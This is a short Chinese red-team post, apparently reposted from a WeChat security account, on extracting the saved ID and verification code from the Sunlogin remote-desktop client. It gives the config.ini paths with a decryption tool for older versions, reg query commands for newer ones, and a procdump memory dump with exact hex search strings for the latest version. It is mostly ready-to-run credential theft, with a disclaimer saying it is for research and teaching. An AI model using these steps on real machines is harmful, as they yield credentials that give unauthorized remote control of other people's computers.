查找向日葵文件地址方法
wmic process where "name like 'SunloginClient.exe'" get ExecutablePath, ProcessId一、老版本
安装版:C:Program FilesOraySunLoginSunloginClientconfig.ini便携版:C:ProgramDataOraySunloginClientconfig.ini
使用工具解密即可:
https://github.com/wafinfo/Sunflower_get_Password
二、较新版本
注册表获取:在向日葵v11.1.2.38529中,强化了加密机制,删除了配置文件config.ini中的fastcode(本机识别码)字段和encry_pwd(本机验证码)字段,而将这些敏感信息放到了注册表中,我们可以通过注册表查询使用Sunflower_get_Password[5]工具即可解密。
工具:
https://github.com/wafinfo/Sunflower_get_Password
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInforeg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo
三、最新版本
内存查找:首先找到向日葵用户进程,然后使用procdump等工具转储进程内存。
tasklist /v | findstr /i sunloginprocdump64.exe -accepteula -ma 进程号
使用Winhex打开转储文件,按下Ctrl+Alt+X快捷键打开十六进制值搜索功能,搜索十六进制值66617374636F646522203A20226b,即可找到本机识别码。
搜索十六进制值636F6C6F725F65646974203E,使用F3快捷键可以跳到下一个匹配处,多跳2次即可找到本机验证码。
原文始发于微信公众号(小白菜安全):红队攻防|向日葵密码抓取全
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论